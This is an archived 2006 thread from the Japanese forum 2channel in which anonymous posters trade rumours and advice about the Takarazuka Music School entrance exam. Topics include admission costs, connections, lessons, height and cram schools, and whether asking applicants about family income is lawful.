2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宝塚★今年の受験について語るスレ3

1 :名無しさん@花束いっぱい。:2006/07/11(火) 08:01:50 ID:phe+C1/d
新スレ!!980踏んだから立てました。受験頑張れ!!

2 :名無しさん@花束いっぱい。:2006/07/11(火) 08:06:09 ID:NUBMnVFX
2なら合格

3 :名無しさん@花束いっぱい。:2006/07/11(火) 08:14:16 ID:NUBMnVFX
言い和すれたが1タソ乙

4 :名無しさん@花束いっぱい。:2006/07/11(火) 16:16:51 ID:mLf/YsoR
昨年度は94期で今年度は95期か・・・みな頑張れ!
1タン乙です!

5 :名無しさん@花束いっぱい。:2006/07/12(水) 21:44:23 ID:o7hfDAPs
>>1
乙華麗!(・∀・)つ旦~

6 :名無しさん@花束いっぱい。:2006/07/12(水) 22:50:01 ID:+3i6G3r7
\晒し上げワッショイ!!/
 +      +
+  晒AGE  +
   (`∀´∩ +
 + (つ  ノ
+   ( ヽノ +
   し(_)   +

晒AGE 晒AGE
(`∀´∩ (`∀´)
(つ  ノ (つ  つ))
ヽ ( ノ ) ) )
(_)し" (_)_)

7 :名無しさん@花束いっぱい。:2006/07/12(水) 23:15:15 ID:zmCPljHL
KIEスレたててくださーい

8 :名無しさん@花束いっぱい。:2006/07/13(木) 00:03:56 ID:yqsG+E/P
スクールの個別スレ乱立は迷惑だからヤメてくれ


9 :名無しさん@花束いっぱい。:2006/07/13(木) 07:38:41 ID:MxrBcOqr
でも未来のジェンヌになるかもしれない子の話は見てて楽しい。
宝塚は金コネの世界。
糞真面目に練習してる人頑張ってね。

10 :名無しさん@花束いっぱい。:2006/07/14(金) 18:25:54 ID:rrSGUyrl
コネあげ

11 :名無しさん@花束いっぱい。:2006/07/14(金) 18:56:46 ID:hHScJCxH
私今年受けるかもしれません。
本当にお金とコネがなければ駄目なんですか?

12 :名無しさん@花束いっぱい。:2006/07/14(金) 19:00:57 ID:Qk3KB3G4
駄目ですよ。
まず二次にも進め無いですね!
まぁ試しに受けたら解ると思うから…
金の無い奴には、面接で声もかけて貰えないよ〜

13 :名無しさん@花束いっぱい。:2006/07/14(金) 19:10:29 ID:PkZ6qsz5
>>12
それは単に品のない人だったとかではなく…?

裕福な家で落ち着いて育った娘さんの方が性格的にも好まれる、という意味ならわかるけれど
「コネとお金を使ってゴリ押しした人が入団してま〜す!」…とか聞くと夢が壊れまくり。

14 :名無しさん@花束いっぱい。:2006/07/14(金) 19:26:25 ID:hHScJCxH
私の姉のお友達はそのようなお金やコネがあるわけでもないですが,今花組で活躍されていますよ?
また私の学校の先輩が去年3人も合格されました。
3人ともお金とコネがあったとは思えないのですが。

例えお金やコネの世界だとしても,そんな事に負けない位自分を磨き,綺麗になって試験に挑みたいと思います。

15 :名無しさん@花束いっぱい。:2006/07/14(金) 19:29:41 ID:PkZ6qsz5
○コネもお金もある迫力のある美人タイプ=イイジャマイカ!(゚∀゚)アヒャ!!
○コネもお金も乏しいけど容姿端麗で芸達者=育て甲斐がありそうな人材キタ!

●コネとお金のあるぶす=興味を持たれる
(その人を採るメリットと採らなかった時のデメリットについて興味深い)
●コネもお金もなく一芸もないぶす=すべてが問題外

こんな感じ?


16 :名無しさん@花束いっぱい。:2006/07/14(金) 19:44:58 ID:Qk3KB3G4
まぁ、良い様に取るお馬鹿が多いのも、ヅカの持ち味なんだろうね。
美人タイプ?
ヅカに美人いたっけ?
入学、入団しても金に付いて行けず4〜5年で脱落が殆どだよ…
舞台の最後列で光も当たらず、辞めて行くよ〜!頑張れ〜〜〜!(爆笑)

17 :名無しさん@花束いっぱい。:2006/07/14(金) 19:49:50 ID:PkZ6qsz5
>>16
そういうものなの?
何にそんなにお金がかかるの?



18 :名無しさん@花束いっぱい。:2006/07/14(金) 20:00:13 ID:PkZ6qsz5
>>16
やーだ。一般人に比べれば美人だったり、全体的にインパクトのある
いわゆる「宝塚顔」の人がほとんどでしょ?

まぁ>>14さんとかは【ミッションスクール系の普通】かもしれないし
団地で生活苦だとか、母親が団地妻でパート生活状態って人は、宝塚には
いなさそうだけど…。(※イメージ的にだから間違ってるかもしんないけど)

宝塚は単なる劇団員の人みたいにチケットノルマがあるわけでもないんでしょ?
大学進学費用を宝塚音楽学校費用に充てれば多少の費用程度は
一般人並でも大丈夫なんじゃないの…?


19 :名無しさん@花束いっぱい。:2006/07/14(金) 20:00:57 ID:Qk3KB3G4
頑張って入って下さい。私の書き込みがなるほどと思いますから…
1〜2人の金無しコネ無しが居ても、その他大半は有りの人達だよ。
入学時に親に準備してもらう物の前に、まず必要なものが有るので…
とにかく自信有るなら頑張って〜
駄目元の気持ちでね!

20 :名無しさん@花束いっぱい。:2006/07/14(金) 20:10:28 ID:PkZ6qsz5
公演先の滞在費とヘアメイクにかかるお金と、自前で買う舞台用の光物類と、
あとは何にかかる…?う〜ん?…捻出できる範囲内っぽいけど。う〜ん…?

>>19
あ!ごめんなさい。
私、もう年齢オーバーしてます。
19さんは、これから結婚して子供産んで、その子が女の子だったら鍛えて
ステキな乙女に育てて、宝塚に入れればいいと思うのです!!(*ノノ)<キャー


21 :名無しさん@花束いっぱい。:2006/07/14(金) 20:12:43 ID:Qk3KB3G4
宝塚顔=美人は止めてほしい、勘違いもいいとこ!
チケは勿論ノルマ有りですよ!
生徒席って、言いますが…

22 :名無しさん@花束いっぱい。:2006/07/14(金) 20:17:00 ID:hHScJCxH
分かりました。
宝塚受けるという事はある程度費用がかかるという事位は承知しておりますので。
また,今もエスカレーター式の私立に通っているので高校にこのまま上がるのと宝塚に行くのでしたら結局同じ位の費用になると思います。

あと,その情報はどちらから聞いたものですか?

23 :名無しさん@花束いっぱい。:2006/07/14(金) 20:24:13 ID:Qk3KB3G4
私は子供でかくなってます(笑)
息子達ですが…
入学時の練習用の物を揃えるだけでも大学入学金位かかるしね。
何しろ、要所要所で必要になりますから…
頑張るって言葉では、やって行けないです。

24 :名無しさん@花束いっぱい。:2006/07/14(金) 20:55:34 ID:C+//ZrZt
ID:Qk3KB3G4が(爆笑)や(笑)を使う件

25 :名無しさん@花束いっぱい。:2006/07/14(金) 22:54:02 ID:z1C/hmjf
それは、ID:Qk3KB3G4 が単にオババだからでつお!

マジで本当に受験を真剣に目指してるような子はここにはこないからね、
思いつき程度の子がきては、ID:Qk3KB3G4 のようなやさぐれオババの
餌食になるのがオチ。
本気なら、ここには来ないほうがよろし。

26 :名無しさん@花束いっぱい。:2006/07/19(水) 22:34:58 ID:oLHLOPKx
公開はされていない暗黙のレッスン代、暗黙のお付き合い代、暗黙のお礼代、人に合わせないといじめられるのでお化粧前や普段使うブランド品など。

27 :名無しさん@花束いっぱい。:2006/07/19(水) 23:39:46 ID:wyTu0zPT
>26
アンカーくらいつけろや、ヴォケ!

28 :名無しさん@花束いっぱい。:2006/07/23(日) 17:09:05 ID:IbdHNpk0
来年の音楽学校のチラシ、出てたよ。いよいよ来年からは募集人数約45名か…受験者数減ってるし倍率は変わらないだろね。

29 :名無しさん@花束いっぱい。:2006/07/27(木) 00:04:25 ID:rJ1/ZhVZ
課題曲て、今でもミュージカルの曲もあるのかな?音花ゆりちゃんがスカステで受験の時にOn my own 歌いましたって言ってたけど。

30 :名無しさん@花束いっぱい。:2006/07/29(土) 22:21:36 ID:oGBHUT3j
確かにそれなりに費用はかかると思います。
でも、むちゃくちゃお金がかかるから 一般家庭出身者は絶対ムリ!、夢をみるのはやめなさい!
みたいなことを言う人の意見をまともに信じて未来の自分の夢を諦めるようなことないようにね!


31 :名無しさん@花束いっぱい。:2006/08/01(火) 12:55:35 ID:r/3uYMBu
>>30さんがいい事言った!

32 :名無しさん@花束いっぱい。:2006/08/01(火) 13:15:52 ID:4C/ZLPD1
皆さんが思うほどお金はかかりませんよ。私立の医学部は学費だけでも600万から1200万さらにマンションを借りたり実習費やらなんだらで、それに比べれば普通の家庭でOKです。

33 :名無しさん@花束いっぱい。:2006/08/01(火) 13:33:44 ID:EIpZhuvX
普通の家庭でOKですか・・?
現役の方で普通のご家庭の方はいらっしゃいますか?

34 :名無しさん@花束いっぱい。:2006/08/01(火) 13:40:02 ID:og6rqvJV
ヅカでいう、普通の家庭と
多分、一般社会でいう、普通の家庭とは基準が違うと聞いていますよ。

東京の私立の音大(医大、美大)に、楽々余裕で、いかせられるような、
ご家庭の方でないと、やっていけませんよ。
それでも、数年後には行き詰るらしいですので。
受験も大変ですが、入学、入団後も、もっと大変ですので
覚悟なさった方がよろしいかと・・・。


35 :名無しさん@花束いっぱい。:2006/08/01(火) 13:41:02 ID:6gBBEDo6
一般家庭でも、入ることは可能だよ。
問題は、その後続けていけるか。

36 :名無しさん@花束いっぱい。:2006/08/01(火) 15:16:46 ID:4C/ZLPD1
娘を持つ親としては宝塚にいければ変な虫も付かずにすくすくと成長できるので安心ですよ。まあ花嫁修業ですね。30歳までに結婚してくれればいいかな。

37 :名無しさん@花束いっぱい。:2006/08/01(火) 17:40:42 ID:rk3+d9lb
宝塚に入れば変な虫が付かないと思ったら大間違い。一般人より変な虫が付く確率は大幅アップだよ。自分の娘が大事なら入れるのやめたほうがいい。

38 :名無しさん@花束いっぱい。:2006/08/01(火) 19:29:05 ID:AtQdSilW
どうしても似たような事がやりたきゃOSKって手も。
宝塚より入試は優しいし
お金も少なくて住むわぁ。

39 :名無しさん@花束いっぱい。:2006/08/01(火) 20:04:45 ID:U5c+cqQG
1億くらいなら、娘のためだったら安いものだわ。
それ以上かかるのかしら?

40 :名無しさん@花束いっぱい。:2006/08/01(火) 22:14:11 ID:RtrO8I+M
かっての月トップマミさんも、実家の援助がなかった〜
ってテレビで言ってたけど、それでもトップはってたんだから
ようするに実力とスター性でしょう。

41 :名無しさん@花束いっぱい。:2006/08/01(火) 22:55:24 ID:3Wv63gfn
とりあえず受けたきゃ受けりゃいいじゃん。
金の心配は二の次。
行き詰った時に考えればいいことよ。

42 :名無しさん@花束いっぱい。:2006/08/01(火) 23:03:02 ID:37bkplZu
愛想良くできる子なら平気。
スターになれなくても金持ち小金持ちをゲットして貢いでもらえば何とかなる。
ファンからの小遣いって集まると結構な額になるんだよね。

43 :名無しさん@花束いっぱい。:2006/08/03(木) 15:44:52 ID:o5seBW/o
他所の財政事情まででしゃばって口はさんでお笑いだわ。
受験させようとしてる家庭なら、覚悟は出来てるものよ、
親切ごかしに当てこすりな忠告なんていらないわよ。
金・コネはここでは敗者の言い訳でしかないんだから。
本当の金・コネの実態なんてまったく知らない連中。
でも、良い子が欲しいのよ劇団は。
金・コネの子よりもね。


44 :名無しさん@花束いっぱい。:2006/08/04(金) 10:27:50 ID:btOICKmZ
>>39さんの娘に生まれたかった。

45 :名無しさん@花束いっぱい。:2006/08/04(金) 23:59:37 ID:2FwfDDh1
劇団が欲しい「良い子」はほんの一握り
それ以外だったらスポンサーついてるのを欲しがる
だってチケット捌けるから
教育じゃなくて商売だからね

46 :名無しさん@花束いっぱい。:2006/08/05(土) 00:10:53 ID:8Jlzowx0
>>45 さんに質問。
では、今年の合格者のその大半はスポンサー付きということですね?
企業なら名前出してかまいませんよね?
大手はどこがついてるんでしょう?
言い切ったんだから逃げはなしでよろしく。

47 :名無しさん@花束いっぱい。:2006/08/06(日) 18:43:37 ID:NkT/bJpl
あー本当に約45名だね。
95期って区切りの年で記念行事もあるから容姿の期らしいね。

48 :名無しさん@花束いっぱい。:2006/08/06(日) 19:09:05 ID:PHevW63C
46は何者…??ww

49 :名無しさん@花束いっぱい。:2006/08/06(日) 21:39:38 ID:dZqWWqV8
夢を見させてあげたいけど、実際合格した人にお金持ちは多いよ。
昔は入試の段階で世帯収入記入だったけど
今は入団時に宗派・世帯収入記入する書類があります。
願書に記入する芸暦(レッスン暦)+家族欄で
大体の世帯年収や、親の子どもに賭けられるお金って
学校側もすぐに分かるんじゃないかな?

皆さんのご贔屓だって、貧乏でいっつもボロボロの格好で
入り出してないでしょ・・・。



50 :名無しさん@花束いっぱい。:2006/08/06(日) 23:54:32 ID:NBff1BU4
容姿の期って、ぶさいくな子1人もいないの?

51 :名無しさん@花束いっぱい。:2006/08/07(月) 09:53:05 ID:iTxypHyJ
容姿の期というものの、毎年「え・・?」というのが数人います。
容姿の期の場合は、バレエ・歌のどちらも同じくらい上手な子が多いの?

52 :名無しさん@花束いっぱい。:2006/08/07(月) 15:47:56 ID:QNzdEi6q
>>49
うん。
宝塚以外の劇団は全然違うもんね。
皆貧乏暮らししてる…服もそんなに綺麗じゃないしね。

53 :名無しさん@花束いっぱい。:2006/08/07(月) 16:39:07 ID:Hi27g28B
私は子供が生まれたらタカラジェンヌにしたいって思ってます
家が裕福なわけではないですが…
かなりのお金がかかるんですよね?
あと何を習わさせたらいいんでしょうか?

54 :名無しさん@花束いっぱい。:2006/08/07(月) 17:36:34 ID:LdVoKaxA
音楽学校入学を目指したときから退団まで
毎月300万円、子供のために使える程度のお金が用意できれば
合格するかどうかは別にしてなんとか過ごせるんじゃなかろうか。
習い事は
クラシックバレエ、ピアノ、歌、日舞、タップ、茶道、書道、公文、リズミック体操、
柔道、漫才
これら全てを10年以上かけて習得させた後に受験スクールに行って見る事をオススメします。

55 :名無しさん@花束いっぱい。:2006/08/07(月) 18:28:08 ID:IT19T/E5
私の従妹、今現役生で結構路線だけど、入団してから
月300万円はかかってないよ。そういういい加減な書き込みやめたほうがいいと思います。

56 :名無しさん@花束いっぱい。:2006/08/07(月) 19:34:13 ID:5kgI/kyf
54 なんか違う物まで入ってませんか?ww暑いからかな〜??いつもに増して変な書き込みが多いよ。
55 お金とコネがないうちの知り合いは綺麗だったり一芸があって受験スクールの先生に推してもらってたよ。あと皆役つくために入ってからも特定の先生についたりしてレッスン代もかかるからそういう裏のまで含んだ額じゃないですか??

57 :名無しさん@花束いっぱい。:2006/08/07(月) 19:51:29 ID:yhBDLhKY
アンカー付けられない、??を使う>>56が言っていい言葉ではない気がする>暑いから

58 :名無しさん@花束いっぱい。:2006/08/07(月) 20:01:39 ID:HID2Vror
金に関係無いのならなんで、二次でいくら出せますか?って聞くんだ…
二年連続聞かれた!スクールなんて、当てにならない!
自分の教室でも金使ってくれる奴優先…
何処のプロダクションでも合格する様な、スター性有れば別だがね…
今、学校通学してる子達は、相当積んでるはず。役貰う時も金だよ!

59 :名無しさん@花束いっぱい。:2006/08/07(月) 21:30:15 ID:MhHlzIRE
>54
>クラシックバレエ、ピアノ、歌、日舞、タップ、茶道、書道、公文、リズミック体操、
>柔道、漫才

それだけ全部習うとどれも中途ハンパで終わると思う

60 :名無しさん@花束いっぱい。:2006/08/08(火) 12:37:05 ID:0NdaIZTl
age

61 :名無しさん@花束いっぱい。:2006/08/08(火) 13:22:21 ID:9+640aGP
柔道に漫才もかよww

どんな子に育つんだwww

62 :名無しさん@花束いっぱい。:2006/08/08(火) 13:30:24 ID:sNwV+Wyu
歌って早くから習って変なクセつくと嫌がられるから
受験1年くらい前でいいと思う(中3ならね)
それまではリトミックで楽譜が読めるくらいになってたらいいんじゃない

まぁ最低限、バレエとピアノだよね
あと太らせないことだ

63 :名無しさん@花束いっぱい。:2006/08/08(火) 13:36:49 ID:EWHRQP2G
ピアノって何で習わせる必要があるの?リズム感覚?

64 :名無しさん@花束いっぱい。:2006/08/08(火) 14:59:03 ID:R/xRHH8f
>63
譜面がよめる。

65 :名無しさん@花束いっぱい。:2006/08/08(火) 15:39:49 ID:MBaBGAWE
+リズム感、音感
音楽学校だものね

66 :名無しさん@花束いっぱい。:2006/08/08(火) 15:54:53 ID:zCnQcmq0
今はピアノは必須です。
譜面がよめないと声楽はお話になりません。

67 :名無しさん@花束いっぱい。:2006/08/11(金) 10:49:14 ID:v5coqNKc
ピアノは最低アップライトでね!
ついでにage

68 :sage:2006/08/11(金) 11:00:37 ID:PSVMaHZe
ピアノは絶対に必要です。
私は10何年ピアノを習ってて、何度もやめたいと思いてましたが
母に無理やり連れて行かれてました。でも宝塚受験を考え初めて
声楽&バレエを習い始めて、ピアノ習っててよかった〜って
かなりおもいましたから!!譜面も読めるし、リズム感も
養える。声楽習い始めてから初めて譜面に触れる人はかなり
苦労すると思いますよ。そんな私は、宝塚受験負け組みですが・・。

69 :名無しさん@花束いっぱい。:2006/08/11(金) 11:02:18 ID:PSVMaHZe
sageの場所間違えた・・・
逃げ=3

70 :名無しさん@花束いっぱい。:2006/08/11(金) 15:58:27 ID:J2O/zfdY
でもピアノやってる人って楽譜読めても
音痴って人多いよね。
私の回りもだし宝塚でもそうだし。

反対に楽譜読めなくても歌えるって人も結構多い
歌で受かるなら声が大事よね。

71 :名無しさん@花束いっぱい。:2006/08/11(金) 19:16:57 ID:XwK37KeC
>反対に楽譜読めなくても歌えるって人も結構多い

そうなんだけど、二次では初見で新曲があるでしょ  

72 :名無しさん@花束いっぱい。:2006/08/11(金) 22:52:23 ID:ztdjNttQ
声が大事なのは分かるけどピアノやってるせいで
音痴になることは無いと思うが・・・。
それはたまたまあなたの周りの人が、
実力が無いだけなんじゃ・・・。
そう思うのはあたいだけか。。

73 :名無しさん@花束いっぱい。:2006/08/12(土) 00:38:43 ID:Ce05I8gr
>でもピアノやってる人って楽譜読めても 
>音痴って人多いよね。 
マリコさんとか彩音ちゃんとかがそうだよね

でもやっぱり読譜力と音感は早いほうがいいみたい
楽譜読むのに時間かかるのが一番もったいなさそうだし
初見のとき

74 :名無しさん@花束いっぱい。:2006/08/12(土) 01:32:09 ID:MVrfBOLu
記憶力がいい
頭のキレがいい
容姿端麗
歌うまい
バレエ上手
体力ある
表現力ある
品がある
華がある
これだけそろえば合格間違いないだろう。


75 :名無しさん@花束いっぱい。:2006/08/12(土) 22:13:18 ID:PZKOznsV
歌で受かるって事が前提ならって事です

歌手としての合格の比重は
声>>>リズム感>>読譜
かなと思いまして。

身近で歌手として受かった子も
あまり楽譜が読める方ではなかったですし。
読譜は音校入ってからどうにかなるし。
声は天性の物があるので。
歌で受からせるなら
受験時は未来性を買って声が良い方を選ぶと思います。
個人的意見なのであしからず。



76 :名無しさん@花束いっぱい。:2006/08/12(土) 22:16:08 ID:PZKOznsV
アンカーつけ忘れました
>71さん
>72さん
>73さん
です。

77 :名無しさん@花束いっぱい。:2006/08/12(土) 22:45:23 ID:BLg5o9MU
>>75
声は自信ないので、他で頑張る
しかない

78 :名無しさん@花束いっぱい。:2006/08/13(日) 19:55:14 ID:2vd+dAtc
一番良いスクールは一体どこなんだろう?

79 :名無しさん@花束いっぱい。:2006/08/13(日) 23:11:20 ID:5XF2Dx9L
川路は〜??

80 :名無しさん@花束いっぱい。:2006/08/13(日) 23:29:34 ID:4ZxRaXgf
足に傷とかある子って受からないの?

81 :名無しさん@花束いっぱい。:2006/08/14(月) 01:50:55 ID:6vL/CP5T
>>80
場所にもよるんじゃない?
膝から下はない方がいいとは思うけど

82 :名無しさん@花束いっぱい。:2006/08/14(月) 10:49:07 ID:JbkyUIl2
思いっきり膝に縫った痕あるorz

川路って全然噂聞かないけどどうなの?

83 :名無しさん@花束いっぱい。:2006/08/15(火) 07:37:52 ID:1AkBumSu
KIEの冬季講習に通おうと思うのだが・・・
北海道からいったら、10万はするだろーなー・・・
95期って容姿の年?らしい。
自信あるの容姿くらいだからラッキーかも。

84 :名無しさん@花束いっぱい。:2006/08/15(火) 17:10:28 ID:HcROGk9h
KIEは100人くらい受けて7人合格  ラヴニールや夢はそんなにいないからせいぜい2、30人の受験で5人とか7人とか合格。この歩留まりどう思う?

85 :名無しさん@花束いっぱい。:2006/08/15(火) 18:06:31 ID:3SL0f09k
83
北海道から通った人いるよ!

86 :名無しさん@花束いっぱい。:2006/08/15(火) 19:47:04 ID:5leUjPAL
>>84
100人も受けてませんから。笑

87 :名無しさん@花束いっぱい。:2006/08/15(火) 21:35:19 ID:OXGLdH9m
少数にしぼって受験させるスクールもあれば
門戸を広げて受験させるスクールもある
それぞれのやりかたで、どちらが正しいとも言えないんじゃないかな
でもなるべく誰にでも機会を与えるって言うのも民主的かな
沢山生徒が集まれば個人の負担も少ないかも
結局実績が無ければ良い生徒は集まらんでしょう。

88 :名無しさん@花束いっぱい。:2006/08/15(火) 21:58:49 ID:DN6aoghq
>>82
だいじょうぶ。 傷の縫った跡は上手い形成外科医に修正して
もらえば殆んど判らなくなるから、そんな傷くらいで落としたりは
しない筈。(ひどい火傷の引き攣れのようなのは運動領域に
制限ができるからダメだけど) 受かればちゃんとした形成外科医を
劇団が紹介してくれるはず。 

89 :名無しさん@花束いっぱい。:2006/08/15(火) 23:00:42 ID:HcROGk9h
テレビで見たら高3は30人近くいたと思われ。50人以上は受けるんでしょ
?でもKIE安いよね。3組なんか本命の為に金払ってあげてるようなものだけど

90 :名無しさん@花束いっぱい。:2006/08/16(水) 13:55:32 ID:Orq2zH+I
KIE・ゆめ・ラヴニール・ハットの1次通過者は何人??

91 :名無しさん@花束いっぱい。:2006/08/18(金) 20:01:11 ID:rV01xBkb
age

92 :名無しさん@花束いっぱい。:2006/08/19(土) 18:55:33 ID:6J2w4mGE
男役はでかい順にとるって本当?

93 :名無しさん@花束いっぱい。:2006/08/19(土) 20:16:41 ID:AiE0imZK
知り合いの人180cmぐらいですが、一次で落ちましたよ。(バレエも声楽も出来る人ですけど)

94 :名無しさん@花束いっぱい。:2006/08/19(土) 20:46:42 ID:g8U86wlR
身長が大きいと怪我もしやすいしね…
ただ大きい人と小さくても魅力的な人
だったら後者のほうが宝塚向き。
知り合いの受験スクールの先生によると
93期からは娘役、男役共に身長はあまり重視されていないとも聞いたよ。

95 :名無しさん@花束いっぱい。:2006/08/19(土) 21:35:47 ID:AiE0imZK
でも大きい受験生増えましたよねぇ。

96 :名無しさん@花束いっぱい。:2006/08/20(日) 00:39:28 ID:SOBsSI4p
確かに私としては男役として大きいことも確かに重要かもしれないけど
ただ大きいよりも大きく見える人が好きだな。


97 :名無しさん@花束いっぱい。:2006/08/20(日) 00:57:00 ID:J95LKpRI
知り合いは娘役とかわらんくらいの身長(男役志望)だけど受かってたよ
ちょっと前は背の高い娘役が多かったからバランスを考えたんじゃない?

98 :名無しさん@花束いっぱい。:2006/08/20(日) 01:06:48 ID:2zCAjjBb
>今は入団時に宗派・世帯収入記入する書類があります。

これって問題だよね?
やっちゃいけないこと。

99 :名無しさん@花束いっぱい。:2006/08/20(日) 01:11:42 ID:2zCAjjBb
>53
1つだけ習わせるならバレエだと思う。
歌は、合唱クラブとか入ってるだけでも、
初見で歌うくらい何とかなる。

100 :名無しさん@花束いっぱい。:2006/08/20(日) 02:11:05 ID:Mscf/agy
>>98 タン そう、これは大問題ですね。
入団となれば阪急に就職するわけだからこれは就職差別の典型ですよ。
親の勤務先や職業も聞いてはならないんですけど、これが本当なら労基署
にツーホーですね。

音楽学校が専門学校とはいえ、その願書に世帯収入など記入させるのは
大問題ですが、本当のことなんでしょうか?

101 :名無しさん@花束いっぱい。:2006/08/20(日) 12:32:55 ID:iOCUoyj6
明らかに憲法違反よね。
なんで世間は何も指摘しないのかしら?

102 :名無しさん@花束いっぱい。:2006/08/20(日) 17:04:27 ID:J95LKpRI
入団するときには既に学校に入っている(=宝塚に入団する人だけ)から、
入試試験の時に志望者全てに聞いているわけではない(それで落とすワケではないし公表もしないと言いそう)
普通の私立高校でも親の会社名は書かすし
世帯年収を聞くのは、音楽学校は宝塚の舞台に立たせるための専門教育機関であって、
一般的に就職するための専門教育を行うところではないという観点から、それなりの金額がかかるから
それを出せる家庭かどうかを判断するためとかいいそうなんじゃない?

103 :名無しさん@花束いっぱい。:2006/08/20(日) 23:34:57 ID:dTgpQABv
願書に書くんじゃないの?
だったら入試の時に全員に聞いてるわけだけど。

104 :名無しさん@花束いっぱい。:2006/08/21(月) 00:04:59 ID:e+XCoBif
この世の中はね、宝塚のお家のご事情より労働法がまづ
優先なの、法治国家ですから。
私立で願書に書かすん?
私立も教育基本法から自由ではないんだよね〜
どこよ、その私立って。

105 :名無しさん@花束いっぱい。:2006/08/21(月) 00:10:48 ID:e+XCoBif
>>102 に質問追加
全員に聞いてるのじゃなくて、恣意的に「選別」
してきいてるほうがより問題なのよ!
ねぇ、本当にソースは確かなんでしょうね?
音楽学校、まずい事になるかもよ、本当なんでしょうね?


106 :名無しさん@花束いっぱい。:2006/08/21(月) 00:32:28 ID:wtVzbZJF
願書に親の職業とか年収とか書く欄なんてあったっけ??
面接では聞かないでしょ??
聞いたとしても、金目的じゃなくて、リラックスさせるためでしょ?

107 :名無しさん@花束いっぱい。:2006/08/21(月) 00:41:02 ID:x/z0qsyc
>>98の引用部分をよく読めば入団時って書いてありますが…

音楽学校の入学時(願書提出時)じゃない。



108 :名無しさん@花束いっぱい。:2006/08/21(月) 00:43:05 ID:bDEIr/e7
家族の名前を書く欄の横に備考欄があり、ここには何を書くという指定はされていません。つまり任意で、職業やコネなど受験で有利な内容を書き込むのです。それで試験官の目に止まれば良いわけですから。

109 :名無しさん@花束いっぱい。:2006/08/21(月) 01:05:50 ID:x/z0qsyc
たびたびすみません。
>>108のおっしゃってる事は本当です。
有利になると思われる事はなんでも記入することをお勧めします。
親・兄弟の役職・学歴等など・・・・
例えば、お爺様が有名な方(会社役員・政治家等)とかだったら
そこまで記入します。まぁ、そんな方がいたら
記入するまでも無く情報は入るんですが。
たとえママが生活の為にパートに出てても
専業主婦と記入すべし。(役職で一流企業にお勤め等の場合は記入)
あと、字が綺麗な願書も印象がいいそうで
合格した知り合いは、書道家に願書記入してもらってました。

昔、某有名芸能人の娘が、自分の実力を試したいと
「ア●ー」の書類審査に親の事は書かず応募したら
書類審査すら不合格だったけど、それにキレタ親が
もう一度●○◎の娘です!って書いて提出させたら
書類審査合格だけではなく、結局舞台に出てました。
テレビで親本人がぶっちゃけてて、ひきました…
世の中、そんなもんです。

110 :名無しさん@花束いっぱい。:2006/08/21(月) 11:52:53 ID:afQd8UhL
友達は二次の面接で親の年収聞かれたって言ってたよ?備考欄に何書いてたまでわわからないけど…

聞いちゃいけないんだよね?

111 :名無しさん@花束いっぱい。:2006/08/21(月) 12:18:26 ID:1wtqdeX6
そういえば音楽学校って教育基本法の適応される場所?
文科省の管轄入ってる?

112 :名無しさん@花束いっぱい。:2006/08/21(月) 13:28:05 ID:a2O5Mdnr
私の親戚に元ジェンヌがいるんですけど、それを願書に書き込んだらどうなる
んでしょうか??

113 :名無しさん@花束いっぱい:2006/08/21(月) 16:21:26 ID:9iCHva0g
少なくとも願書に親の職業、年収を書く欄はありません。 
やはり問題があるというので、何年か前に無くなったと元音楽学校の校長先生が書いた
本に書いてありました。
備考欄に書くのは自由ですが・・・

>112
知り合いは、お母様もお祖母様も元ジェンヌでしたが結局うかりませんでした。
超有名演出家の姪も今年不合格でした。
親戚にジェンヌがいる程度ではどうにもなりません。
面接のときの話題になるかも知れませんが、
そんなことを考える暇があるならレッスンに励みましょう。

114 :名無しさん@花束いっぱい。:2006/08/21(月) 16:42:26 ID:1mQ6Uvrr
勇気がわいてきました。
113さん有難う!!
お稽古頑張ります!!!

115 :名無しさん@花束いっぱい。:2006/08/22(火) 16:07:39 ID:UVWZND18
両親が小学校の先生と中学校の先生の家庭では
お金続きませんか? ムリでしょうか?

116 :名無しさん@花束いっぱい。:2006/08/22(火) 18:38:15 ID:CmWDGOmv
小学校の先生と中学校の先生って年収はどのくらいなのかなぁ?
でもご両親共に働いていらっしゃるなら、所帯収入は
少なくても1千万〜1千500万はあるでしょう? もしくはそれ以上?
大丈夫なんじゃないの?

117 :名無しさん@花束いっぱい。:2006/08/22(火) 19:02:11 ID:E4NVSpFy
入るだけなら可能性はあると思うよ(知り合いのジェンヌさんは両親とも教師だし、音楽学校の授業料分は出せるでしょう)
とりあえず入れるように必要なレッスンしてください

118 :名無しさん@花束いっぱい。:2006/08/22(火) 19:11:53 ID:4wmxkepW
>>102
入学したらコレコレのお金がかかりますが…(大丈夫ですか?)

と念を押すのは問題ないが、年収を書かせるのは問題。

119 :名無しさん@花束いっぱい。:2006/08/22(火) 20:11:39 ID:OhBhRIfx
>>118
書かせるのではなく、自発的に率先して書くのなら無問題でしょ?

120 :名無しさん@花束いっぱい。:2006/08/22(火) 21:25:30 ID:UVWZND18
公務員(先生)の年間平均収入は700万って書いてありました。
管理職ならもっとでしょうか?

121 :名無しさん@花束いっぱい。:2006/08/22(火) 22:08:36 ID:tZm1pe73
音校が、家庭の経済状況で就学が困難になっては
教育的観点から可哀想だから聞くと本気で思ってるのか?

サラリーマン家庭の子女でも、すでにスポンサーや(縁戚関係とか
まぁ、色々)タニマチさまがついてる子もいるわけ。
それなんぞは大いに備考欄に書き込んで恥ずかしくないけどね。
大台チョロチョロの年収書いても触手が動かんわ。

122 :名無しさん@花束いっぱい。:2006/08/22(火) 22:43:44 ID:XgtMvXSw
>>120
たかだか公務員ならわざわざ年収書く必要はない
管理職でも大して変わらない
書いて墓穴ほるくらいなら書かない方がマシ

123 :名無しさん@花束いっぱい。:2006/08/22(火) 23:36:08 ID:tZm1pe73
願書の記入内容など、ここなんかで聞いたって無駄だよ。
スクールや、身近で顔の見える元受験生から指導受けるべし。
予断と憶測と屈折した妄想・願望で受験生叩きしたい奴が巣食ってるんだから。

124 :名無しさん@花束いっぱい。:2006/08/23(水) 23:58:22 ID:90bWZe8r
ラヴニールと夢の情報希望。有望な子いる?KIE情報たくさんなのにたくさん受かったこのスクールの情報少ないのはなぜ?

125 :名無しさん@花束いっぱい。:2006/08/24(木) 00:09:12 ID:zu8Efy63
知ってどうする?
情報がこんなとこで漏れないのは指導が行き届いてる、
生徒が自覚的だからだよ!

126 :名無しさん@花束いっぱい。:2006/08/24(木) 00:58:33 ID:6OvRSeGg
なるほど。生徒の質がKIEとは違うってことね。

127 :名無しさん@花束いっぱい。:2006/08/24(木) 01:10:37 ID:3JHmhOV7
